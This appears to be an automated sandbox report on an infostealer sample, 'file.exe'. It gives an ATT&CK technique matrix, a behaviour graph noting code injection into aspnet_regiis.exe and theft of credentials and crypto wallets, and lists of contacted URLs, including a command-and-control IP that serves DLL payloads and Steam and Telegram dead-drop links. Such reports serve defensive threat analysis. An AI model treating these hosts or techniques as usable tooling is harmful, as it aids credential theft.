                          Deobfuscate/Decode Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)4
                          Obfuscated Files or Information                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Software Packing                          		NTDS54
                          System Information Discovery                          		Distributed Component Object ModelInput Capture114
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          DLL Side-Loading                          		LSA Secrets151
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          Masquerading                          		Cached Domain Credentials31
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Virtualization/Sandbox Evasion                          		DCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job511
                          Process Injection                          		Proc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524661 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 30 steamcommunity.com 2->30 38 Multi AV Scanner detection for domain / URL 2->38 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 12 other signatures 2->44 7 file.exe 3 2->7         started        signatures3 process4 file5 18 C:\Users\user\AppData\Roaming\msvcp110.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->20 dropped 46 Detected unpacking (changes PE section rights) 7->46 48 Contains functionality to inject code into remote processes 7->48 50 Writes to foreign memory regions 7->50 52 2 other signatures 7->52 11 aspnet_regiis.exe 169 7->11         started        16 conhost.exe 7->16         started        signatures6 process7 dnsIp8 32 49.12.197.9, 443, 49722, 49723 HETZNER-ASDE Germany 11->32 34 steamcommunity.com 104.102.49.254, 443, 49721 AKAMAI-ASUS United States 11->34 36 147.45.44.104, 49746, 80 FREE-NET-ASFREEnetEU Russian Federation 11->36 22 C:\ProgramData\softokn3.dll, PE32 11->22 dropped 24 C:\ProgramData\nss3.dll, PE32 11->24 dropped 26 C:\ProgramData\mozglue.dll, PE32 11->26 dropped 28 3 other files (1 malicious) 11->28 dropped 54 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->54 56 Found many strings related to Crypto-Wallets (likely being stolen) 11->56 58 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->58 60 5 other signatures 11->60 file9 signatures10

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe21%ReversingLabsWin32.Infostealer.Generic
                          file.exe31%VirustotalBrowse
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Roaming\msvcp110.dll100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          steamcommunity.com0%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://player.vimeo.com0%URL Reputationsafe
                          https://player.vimeo.com0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://lv.queniujq.cn0%URL Reputationsafe
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                          https://store.steampowered.com/;0%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                          http://ocsp.sectigo.com00%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                          https://recaptcha.net/recaptcha/;0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
                          https://49.12.197.9/N9%VirustotalBrowse
                          https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869/badges0%VirustotalBrowse
                          https://49.12.197.9/10%VirustotalBrowse
                          https://49.12.197.9/freebl3.dll0%VirustotalBrowse
                          https://www.youtube.com0%VirustotalBrowse
                          https://www.google.com0%VirustotalBrowse
                          https://49.12.197.9/sqlp.dll11%VirustotalBrowse
                          http://cowod.hopto.org_DEBUG.zip/c0%VirustotalBrowse
                          https://49.12.197.910%VirustotalBrowse
                          https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.00%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol0%VirustotalBrowse
                          https://49.12.197.9/softokn3.dll0%VirustotalBrowse
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP0%VirustotalBrowse
                          http://www.mozilla.com/en-US/blocklist/0%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          steamcommunity.com
                          		104.102.49.254
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://49.12.197.9/trueunknown
                          https://49.12.197.9/freebl3.dlltrueunknown
                          https://49.12.197.9/sqlp.dlltrueunknown
                          https://49.12.197.9/softokn3.dlltrueunknown
                          https://49.12.197.9/vcruntime140.dlltrue
                            		unknown
                            https://49.12.197.9/nss3.dlltrue
                              		unknown
                              https://49.12.197.9/mozglue.dlltrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://player.vimeo.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                https://49.12.197.9/baspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://steamcommunity.com/?subsection=broadcastsaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                  https://49.12.197.9/gaspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531063121.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531200082.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2531268467.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://49.12.197.9/nss3.dll.9#aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://store.steampowered.com/subscriber_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.gstatic.cn/recaptcha/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://49.12.197.9/Naspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://49.12.197.9/Saspnet_regiis.exe, 00000003.00000003.2517610034.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2518356276.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://49.12.197.9/freebl3.dll6aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552104123.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://steamcommunity.com/profiles/76561199780418869/badgesaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                          https://49.12.197.9/Waspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.youtube.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://49.12.197.9/;aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://www.google.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://49.12.197.976561199780418869[1].htm.3.drfalseunknown
                                              https://49.12.197.9/Aaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=easpnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                                https://49.12.197.9FHIEHDGI--aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		unknown
